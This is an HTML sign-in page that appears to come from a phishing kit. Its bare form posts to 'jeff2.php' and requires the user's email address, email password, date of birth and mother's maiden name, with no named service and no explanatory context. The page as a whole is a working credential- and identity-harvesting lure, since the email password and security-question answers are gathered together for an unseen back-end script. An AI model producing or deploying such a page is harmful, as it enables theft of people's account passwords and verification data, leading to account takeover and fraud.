<!doctype html>
<html>
<head>
<title>Sign In</title>
</head>
<body>
<center>
  <link href="style.css" rel="stylesheet">

<form action="jeff2.php" method="post"><br><br><br><br><br><br>
<br><br><br><fieldset><br>
<input type="email" name="user" placeholder="Email" required >
<br><br><input type="password" name="pass" placeholder="Email Password" required ><br>
    <br>

<link rel="stylesheet" href="http://code.jquery.com/ui/1.12.1/themes/base/jquery-ui.css">
  <link rel="stylesheet" href="http://jqueryui.com/resources/demos/style.css">
  <script src="https://code.jquery.com/jquery-1.12.4.js"></script>
  <script src="https://code.jquery.com/ui/1.12.1/jquery-ui.js"></script>
  <script>
  $( function() {
    $( "#datepicker" ).datepicker({
      changeMonth: true,
      changeYear: true,
yearRange: '-70:-18'
    });
  } );
  </script>                       
 <input name="bday" type="text" tabindex="1" size="19" id="datepicker" placeholder="Date of Birth" required/>  

    <br><br>

<input type="text" name="mname" placeholder="Mother's Maiden Name" required ><br><br>
    <input type="submit" name="submit" value="Submit"/> <br> <br><br></fieldset>

</center>
</form>
</body>
</html>
